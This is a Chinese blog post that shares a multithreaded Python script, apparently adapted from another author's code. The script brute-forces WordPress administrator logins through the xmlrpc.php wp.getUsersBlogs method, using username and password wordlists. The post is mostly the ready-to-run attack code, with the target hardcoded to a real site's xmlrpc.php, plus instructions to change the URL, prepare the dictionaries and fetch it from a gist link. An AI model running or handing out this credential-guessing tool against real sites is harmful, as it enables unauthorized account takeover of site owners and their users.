- A+
所属分类:神兵利刃
看了qingxp9写的代码,修改成一个多线程版本。
漏洞原理请看:http://www.freebuf.com/articles/web/38861.html
以下是代码
import futures
import requests
from Queue import Queue
XML_URL = "http://www.freebuf.com/xmlrpc.php"
USER_FILE = "username.txt"
PASS_FILE = "password.txt"
THREAD_NUM = 20
data = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>"""
task = Queue()
def attack():
while not task.empty():
username = task.get()
pass_txt = open(PASS_FILE)
for password in pass_txt:
req = requests.post(XML_URL, data=data % (username, password.rstrip("\n")))
if 'isadmin' in req.text:
print "[+] username = " + username + " password = " + password
break
print "[-] username %s finished" % username
def main():
user_txt = open(USER_FILE)
for username in user_txt:
task.put(username.rstrip("\n"))
executor = futures.ThreadPoolExecutor(max_workers=THREAD_NUM)
for i in range(THREAD_NUM):
executor.submit(attack)
executor.shutdown()
if __name__ == "__main__":
main()
需要手工修改xmlrpc.php地址,准备字典username.txt和password.txt
GIST地址:
https://gist.github.com/sipcer/cf2b4e56fe28835c3ceb
抛砖引玉,大牛速来
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
